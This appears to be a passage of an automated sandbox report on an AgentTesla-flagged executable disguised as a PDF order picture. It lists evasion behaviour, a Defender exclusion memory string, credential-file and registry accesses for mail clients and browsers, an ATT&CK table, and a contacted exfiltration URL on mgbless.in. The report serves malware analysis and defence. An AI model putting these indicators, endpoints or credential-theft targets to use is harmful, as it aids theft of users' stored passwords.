                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236594
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236094
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235204
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235078
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 234953
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 1168
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 2873
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 890
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWindow / User API: threadDelayed 8962
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239872
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239761
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 35197
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239656
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239546
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239438
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239297
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239187
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239047
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238907
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238781
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238672
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238547
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238437
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238328
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238219
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237797
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237500
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237391
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237250
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237141
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236954
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236594
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236094
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235204
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 235078
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 234953
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_00E128A8 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.4294230.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.425ea10.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 4296, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection12Masquerading1OS Credential Dumping1Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      mgbless.in5%VirustotalBrowse
                      www.mgbless.in8%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.mgbless.in8%VirustotalBrowse
                      http://www.mgbless.in0%Avira URL Cloudsafe
                      https://www.mgbless.in4Xl0%Avira URL Cloudsafe
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php9%VirustotalBrowse
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php0%Avira URL Cloudsafe
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.mgbless.in4XlLm0%Avira URL Cloudsafe
                      https://www.mgbless.in0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://www.mgbless.inD8Xl470%Avira URL Cloudsafe
                      http://mgbless.in0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://OcJtmX.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mgbless.in
                      104.223.93.105
                      truetrueunknown
                      www.mgbless.in
                      unknown
                      unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.phptrue
                      • 9%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNS#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.mgbless.in#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmptrue
                      • 8%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in4Xl#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.mgbless.in4XlLm#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.mgbless.in#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.org%GETMozilla/5.0#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      low
                      https://www.mgbless.inD8Xl47#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://mgbless.in#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmpfalse
                        high
